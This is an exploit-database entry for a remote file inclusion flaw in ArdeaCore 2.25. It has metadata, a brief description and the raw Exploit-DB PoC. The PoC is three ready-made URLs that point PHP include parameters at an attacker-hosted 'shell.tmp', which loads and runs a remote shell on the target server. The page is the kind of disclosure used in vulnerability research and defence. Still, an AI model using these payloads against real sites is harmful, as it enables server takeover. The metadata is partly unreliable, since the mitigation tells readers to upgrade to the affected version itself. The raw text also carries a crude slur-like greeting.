header-logo
Suggest Exploit
vendor:
ArdeaCore
by:
n0n0x
9,8
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: ArdeaCore
Affected Version From: 2.25
Affected Version To: 2.25
Patch Exists: YES
Related CWE: N/A
CPE: a:priasantai:ardea_core:2.25
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

n0n0x

A remote code execution vulnerability exists in ArdeaCore v2.25 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable application. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of ArdeaCore v2.25 or later.
Source

Exploit-DB raw data:

******************************************************
[!] Discovered: n0n0x
[!] Homepage: http://priasantai.uni.cc/
[!] Remote: yes
******************************************************
  
*****************************************[ Hello gay ]***********************************************
****************************************************************************************************************
[x] PoC:

http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaBlog.php?CURRENT_BLOG_PATH=[http://server/shell.tmp???]
http://host/ardeaCore_v2.25/ardeaCore/lib/core/mvc/ardeaMVC.php?appMVCPath=[http://server/shell.tmp???]
****************************************************************************************************************

*****************************************[ Hello gay ]***********************************************
 
****************************************************************************************************************
[!] Thanks:
 
    manadocoding.net, sekuritionline.net
****************************************************************************************************************
[!] Greetz:
 
    str0ke, angky.tatoki,EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin,team_elite
    devilbat.

[!] special thanks : cr4wl3r - cyberl0g
****************************************************************************************************************

Navigation

Suggest Exploit

Services By CQR